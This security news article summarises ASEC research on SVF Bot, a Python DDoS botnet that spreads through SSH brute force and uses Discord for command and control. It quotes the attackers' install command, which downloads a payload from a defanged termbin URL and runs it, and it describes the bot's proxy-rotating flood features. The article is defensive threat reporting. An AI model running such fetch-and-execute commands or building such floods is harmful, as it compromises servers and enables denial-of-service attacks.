Cybersecurity researchers at AhnLab Security Intelligence Center (ASEC) have identified a sophisticated campaign targeting poorly secured Linux servers through SSH brute force attacks, deploying a Python-based DDoS botnet called SVF Bot that leverages Discord as its command-and-control infrastructure.
The SVF Botnet represents a concerning evolution in DDoS attack methodology, utilizing legitimate platforms to evade detection.
Developed by the self-identified “SVF Team,” the malware is distributed as Python source code and establishes communication with threat actors through Discord servers using bot tokens for authentication.
Upon successful SSH compromise, attackers deploy the malware using a sophisticated installation command that creates a virtual Python environment and downloads necessary dependencies: python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget hxxps://termbin[.]com/4ccx -O main.py; python main.py -s 5
The malware’s architecture includes a server grouping mechanism, allowing threat actors to organize infected machines into clusters for coordinated attacks.
When executed, SVF Bot sends server identification information via Discord webhooks, enabling operators to manage multiple compromised systems simultaneously.
SVF Bot’s technical sophistication extends to its DDoS attack capabilities, supporting both Layer 4 UDP floods and Layer 7 HTTP floods with advanced evasion techniques.
The malware includes comprehensive command functionality. $http, $customhttp, $udp, and $customudp commands for different attack vectors.
A particularly notable feature is the malware’s proxy integration system. Before launching HTTP flood attacks, SVF Bot scrapes proxy addresses from ten public sources, including sslproxies.org, free-proxy-list.net, and multiple GitHub repositories containing proxy lists.
The malware validates each proxy by attempting Google authentication before incorporating them into its attack infrastructure.
This proxy validation process ensures high-quality anonymization during attacks, making detection and attribution significantly more challenging for defenders.
During HTTP flood operations, the malware randomly selects validated proxies for each connection attempt, effectively distributing attack traffic across multiple IP addresses.
The SVF Botnet campaign highlights critical security gaps in Linux server management practices.
ASEC researchers emphasize that organizations must implement robust SSH security measures, including complex passwords, regular credential rotation, and system patching protocols.
Network administrators should deploy comprehensive firewall solutions to restrict unauthorized external access and maintain updated security software.
The malware’s exploitation of legitimate platforms, such as Discord, and public proxy services demonstrates the evolving sophistication of modern botnet operations, necessitating enhanced monitoring capabilities to detect anomalous network behavior patterns and unauthorized outbound connections to messaging platforms.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…